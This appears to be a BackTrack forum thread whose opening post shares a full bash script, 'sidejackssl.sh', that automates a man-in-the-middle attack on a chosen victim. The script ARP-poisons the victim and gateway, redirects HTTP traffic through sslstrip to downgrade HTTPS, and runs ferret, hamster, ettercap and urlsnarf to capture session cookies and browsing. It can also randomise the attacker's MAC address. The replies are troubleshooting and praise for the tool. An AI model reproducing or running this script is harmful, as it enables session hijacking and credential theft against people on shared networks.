Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: Another script for sidejacking..

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Another script for sidejacking..

    I know there are other scripts out there that do the same thing but, here is one I made. Perhaps someone else will find it useful. It basically uses hamster, ferret, sslstrip, ettercap, urlsnarf, and arpspoof, although adding your favourite program shouldn't be too difficult.

    I tested it in Backtrack 4 R2. One thing to note is the paths of ferret and hamster are hardcoded because it seems there is a problem with just executing them as is. At least on my R2 installation. You can customize it to suit your own needs, like the xterm window sizes and a few other things.

    Code is here:
    Gorara - sidejackssl.sh

    And here:
    Code:
    #!/bin/bash
    
    # sidejackssl.sh v0.1
    # tested in backtrack 4 R2 environment, run as root.
    # xterm used for window control
    # arpspoof poisons a single victim and gateway
    # ferret and hamster for sidejacking
    # sslstrip for https
    # ettercap for everything else
    # urlsnarf to monitor visited urls
    # firefox needs to be configured with a proxy of 127.0.0.1:1234
    # url for hamster server is http://hamster
    # by gorara
    
    # a few variables (do not change)
    m1="0"					# missing file var m1
    m2="0"					# missing file var m2
    m3="0"					# missing file var m3
    m4="0"					# missing file var m4
    quickclean="0"				# used for quick clean up
    randmac="n"				# default setting do not randomize MAC
    hamsterfile="hamster.txt"		# hamster output file (you can't change it)
    trap 'cleanup' SIGINT SIGTERM		# detect control-c
    
    # a few more variables (change these if required)
    
    # xterm window variables
    x="0"					# x offset value
    y="0"					# y offset value
    width="120"				# width value
    height="7"				# height value
    yoffset="120"				# y offset
    fgcolor="white"				# foreground color
    bgcolor="black"				# background color
    
    # style variables
    warnstyle="[\e[01;38mw\e[00m]"		# warning msgs style
    execstyle="[\e[01;32mx\e[00m]"		# execute msgs style
    infostyle="[\e[01;34mi\e[00m]"		# informational msgs style
    inputstyle="[\e[01;30m?\e[00m]"		# input msgs style
    
    # file variables
    sslstripfile="sslstrip.log"		# sslstrip output file name
    snifffile="sniff-*"			# hamster sniff file wildcard
    etterfile="etter.cap"			# ettercap output cap file
    temp="/tmp"				# temporary dir
    
    function usage
    {
    	clear
    	echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
    	echo ""
    	echo "	-i interface	interface to use, ex. eth0, wlan0."
    	echo "	-t target	the target IP address."
    	echo "	-g gateway	the gateway IP address."
    	echo "	-r		randomize your MAC address,"
    	echo "			only use for wired interfaces."
    	echo "	-h		display this help screen."
    	echo ""
    	echo "	examples: "
    	echo "	 bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
    	echo "	 bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
    	echo ""
    	exit 0
    }
    
    function cleanup() {
    echo -e "\n$warnstyle control-c pressed! "
    
    # exit script if nothing has been modified
    if [[ "$quickclean" = "1" ]]; then
    echo -e "$infostyle nothing changed, all done!"
    exit 0
    fi
    
    echo -e "$infostyle cleaning up..."
    echo -e "$execstyle flushing iptables..."
    iptables -F
    iptables -t nat -F
    
    echo -e "$execstyle turning off IP forwarding..."
    echo "0" > /proc/sys/net/ipv4/ip_forward
    
    # change back MAC address to orignal one
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
    echo -e "$execstyle resetting MAC address...";
    echo -e "$infostyle original MAC is: $origmac"
    ifconfig $interface down
    ifconfig $interface hw ether $origmac
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    rm $temp/mac.orig
    rm $temp/gw.orig
    fi
    
    echo -e "$execstyle cleaning up files..."
    echo -e "$infostyle temp directory: "
    
    # testing to see if files exist, if so display them...
    	if [ -f $temp/$sslstripfile ]; then
    	ls $temp/$sslstripfile
    	else
    	#echo -e "$warnstyle missing $sslstripfile"
    	m1="1"
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	ls $temp/$etterfile
    	else
    	#echo -e "$warnstyle missing $etterfile"
    	m2="1"
    	fi
    
    echo -e "$infostyle current directory: "
    
    	if [ -f $snifffile ]; then
    	ls $snifffile
    	else
    	#echo -e "$warnstyle missing $snifffile"
    	m3="1"
    	fi
    
    	if [ -f $hamsterfile ]; then
    	ls $hamsterfile
    	else
    	#echo -e "$warnstyle missing $hamsterfile"
    	m4="1"
    	fi
    
    # testing to see if there are any files at all
    if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
    
    while [[ "$delete" != "y" || "$delete" != "n" ]]
    
    echo -en "$infostyle delete file(s)? [y/n]: " 
    read delete
    
    do
        case "$delete" in
            y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
    	n) echo -e "$warnstyle nothing deleted!"; break;;
        	*) echo -e "$warnstyle wrong selection!";
        esac
    done
    
    # delete files as requested
    if [[ "$delete_marker" = "y" ]]; then
    	if [ -f $temp/$sslstripfile ]; then
    	rm $temp/$sslstripfile
    	fi
    
    	if [ -f $temp/$etterfile ]; then
    	rm $temp/$etterfile
    	fi
    
    	if [ -f $snifffile ]; then
    	rm $snifffile
    	fi
    
    	if [ -f $hamsterfile ]; then
    	rm $hamsterfile
    	fi
    fi
    
    else
    
    	echo -e "$warnstyle nothing to delete!"
    fi
    
    echo -e "$infostyle all done!"
    exit 0
    }
    
    
    # start main program
    if [ "$#" -eq 0 ]; then
    usage
    fi
    
    while [ "$#" -gt 0 ]
    do
        case "$1" in
            -i)  interface=$2; shift 1;;
    	-r)  randmac="y"; shift 1;;
    	-t)  target=$2; shift 1;;
    	-g)  gateway=$2; shift 1;;
    	-h)  usage;;
    	-*)  usage; break;;
    	*)  break;;
        esac
        shift
    done
    
    # required parameters
    if [[ -z $interface || -z $target || -z $gateway ]]; then
    usage
    exit 0
    fi
    
    clear
    
    if [[ "$randmac" = "y" ]]; then
    mac="yes"
    else
    mac="no"
    fi
    
    # set quick cleanup flag
    quickclean="1"
    
    echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
    echo -e "$infostyle ctrl-c to abort at any time."
    echo -e "$infostyle attack summary:"
    echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
    
    if [[ "$randmac" = "y" ]]; then 
    
    echo -e "$execstyle change of $interface MAC address requested."
    
    if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
    echo -e "$infostyle wireless device detected..." 
    echo -e "$warnstyle can't change MAC address without taking wifi interface down"
    echo -e "$warnstyle do it manually before connecting to the AP."
    exit 0
    fi
    
    if [[ "$interface" = eth* ]]; then
    echo -e "$infostyle wired device detected..." 
    echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
    echo -en "$inputstyle do you want to continue? [y/n]: "
    read continue
    	if [[ "$continue" = "y" ]]; then
    	echo -e "$infostyle proceeding..."
    	else
    	echo -e "$infostyle exiting..."
    	exit 0	
    	fi
    fi
    
    origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
    
    fi
    
    # before this, ctrl-c will exit script without doing anything.
    quickclean="0"
    
    # use macchanger to randomize MAC address, ect.
    if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then 
    echo -e "$execstyle randomizing MAC address...";
    gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
    ifconfig $interface down
    macchanger -r $interface > $temp/mac.orig
    ifconfig $interface up
    	if [ -z $gw ]; then
    	echo -e "$warnstyle WARNING, you have no default gateway!"
    	else
    	route add default gw $gw
    	fi
    origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
    fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
    echo -e "$infostyle original MAC is: $origmac"
    echo -e "$infostyle faked    MAC is: $fakemac"
    fi
    
    echo -e "$execstyle turning on IP Forwarding..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo -e "$execstyle configuring iptables..."
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sleep 1
    
    echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
    sleep 2
    
    echo -e "$execstyle starting ferret   ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
    sleep 2
    
    echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
    sleep 2
    
    echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
    sleep 2
    
    echo -e "$execstyle starting urlsnarf ... <logging to: console>"
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
    sleep 2
    
    echo -e "$infostyle trap is ready, now to direct traffic..."
    
    echo -e "$execstyle ARP poisoning the target..."
    y=$(($y+$yoffset))
    xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
    sleep 1
    
    echo -e "$infostyle run firefox and type http://hamster"
    echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
    echo -e "$infostyle press ctrl-c to exit and clean up... \n"
    for ((;;)) do 
    read loop
    echo -en "$infostyle press ctrl-c to terminate!"
    done
    
    exit 0

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    55

    Default Re: Another script for sidejacking..

    Very slick. Will test tonight and provide feedback. You should start a google code page to track changes.

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    13

    Default Riferimento: Another script for sidejacking..

    its not working , i use r2 but i get eror when run it

    sh sidejacking.sh

  4. #4
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by Xploit View Post
    its not working , i use r2 but i get eror when run it

    sh sidejacking.sh
    And we are just suppose to know what happened if you don't give us the error message ?
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  5. #5
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by Xploit View Post
    its not working , i use r2 but i get eror when run it

    sh sidejacking.sh
    I am going to take a guess

    you need to

    chmod +x sidejacking.sh

    (you need to make the script executable)

  6. #6
    Just burned his ISO
    Join Date
    Nov 2010
    Location
    Greece
    Posts
    7

    Default Re: Riferimento: Another script for sidejacking..

    Quote Originally Posted by spudgunman View Post
    I am going to take a guess

    you need to

    chmod +x sidejacking.sh

    (you need to make the script executable)
    Actually, thats not really required, simply copy-paste code into file, save as sidejackssl.sh (or whatever you want), and run as such:

    Code:
    bash sidejackssl.sh
    It requires parameters, which the script will show you if you run it like this. You can change it to make it executable and run as ./sidejackssl.sh if you wish.

  7. #7
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: Another script for sidejacking..

    root@bt:~# bash sidejackssl.sh
    : command not founde 2:
    : command not founde 14:
    : command not founde 24:
    : command not founde 26:
    : command not founde 35:
    : command not founde 41:
    : command not founde 47:
    'idejackssl.sh: line 49: syntax error near unexpected token `{
    'idejackssl.sh: line 49: `{

    Im attempting too run this on BT4-R2. I get this error doing it both "bash sidejackssl.sh" and "./sidejackssl.sh"

    just reporting, im sorry if the answer is simple and beyond my grasp.

  8. #8
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Default Re: Another script for sidejacking..

    Absolutely brilliant. It works like a bomb. I just need to test the BackTrack Linux - Penetration Testing Distribution proxy but rest of the stuff in the meantime.

    Excellent work

  9. #9
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    4

    Default Re: Another script for sidejacking..

    Nice! Worked great for me. Definitely handy dandy and a great script. Thanks!

  10. #10
    Member
    Join Date
    Feb 2010
    Posts
    69

    Default Re: Another script for sidejacking..

    Well done! Keep it up!

Page 1 of 2 12 LastLast

Similar Threads

  1. [Video] Session Sidejacking (Ferret and Hamster)
    By imported_g0tmi1k in forum OLD BackTrack 4 Howto
    Replies: 2
    Last Post: 03-19-2010, 08:57 PM
  2. Sidejacking on wep networks?
    By EndOfDays442 in forum Beginners Forum
    Replies: 1
    Last Post: 03-16-2010, 06:17 PM
  3. Sidejacking after decrypting WPA packets from capture
    By purehate in forum OLD BT4 Videos
    Replies: 0
    Last Post: 10-03-2009, 05:15 PM
  4. SideJacking
    By imported_Speedy in forum OLD Tutorials and Guides
    Replies: 6
    Last Post: 11-16-2008, 12:58 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •